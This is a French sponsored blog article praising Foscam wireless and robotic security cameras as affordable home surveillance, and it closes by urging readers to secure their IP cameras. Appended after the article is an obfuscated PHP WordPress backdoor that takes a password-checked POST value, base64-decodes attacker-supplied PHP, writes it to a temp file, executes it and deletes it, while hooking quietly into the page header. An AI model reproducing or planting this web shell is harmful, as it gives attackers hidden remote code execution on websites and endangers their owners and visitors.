Comment surveiller sa maison avec une caméra robotisée sans se ruiner ?

Comment surveiller sa maison avec une caméra robotisée sans se ruiner ? Posted on novembre 18, 2020

Bonne nouvelle, aujourd’hui tout le monde peut se permettre d’avoir une vidéosurveillance à son domicile (extérieur comme intérieur) à moindre coût et de manière fiable. Cela notamment grâce aux marque chinoise de qualité comme Foscam. Il y a quelques années encore, ce matériel était considéré comme professionnel et coutait un maximum… mais ce n’est plus le cas !

Une surveillance vidéo 100% sans fil pas cher

La marque Foscam a clairement percé en Europe, notamment grâce au e-commerce qui a fait découvrir la gamme de produit du constructeur chinois au grand public. La gamme est aujourd’hui ultra complète que ce soit en termes d’accessoires, de caméras de surveillance intérieur ou extérieur. Les prix sont imbattables tout comme d’ailleurs le rapport qualité / prix qui n’a rien à envier aux constructeurs européens ou américains. La plupart de leurs modèles existent en sans fil (et même carte SD pour enregistrer en local) et sont très rapide à installer et simples à l’usage grâce au logiciel dédié. On retrouve des technologies telles que la robotisation, le zoom, la vision nocturne et autre ! Le tout en Full HD (merci les capteurs Sony)… que demander de plus à ce prix ?

Installer une caméra de sécurité, quelle que soit la qualité d’image, ce n’est finalement qu’un détail. Le plus important au final, c’est ce que l’on veut en faire et pour ça, les produits Foscam ont un sérieux avantage de choix d’exploitation : en direct ou en différé, dans le cloud Foscam (payant) ou en local, etc. La camera exterieur pourra être fixée à un mur et paramétrée en sans fil avec détecteur de mouvement + vision nocturne.

Les produits sont livrés avec une application Foscam “maison”, permettant le contrôle total des caméras. La fonction détection de mouvement / alarme est un vrai plus pour l’autonomie et l’économie de place d’enregistrement. Depuis un PC, on peut aussi passer en mode avancer et tout configurer aux petits oignons (FTP, NAS Synology, etc).

Quoi qu’il arrive, pensez bien à sécuriser vos caméras IP après installation sous risque de piratage et d’espionnage !

 

Note : article publi-rédactionnel

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}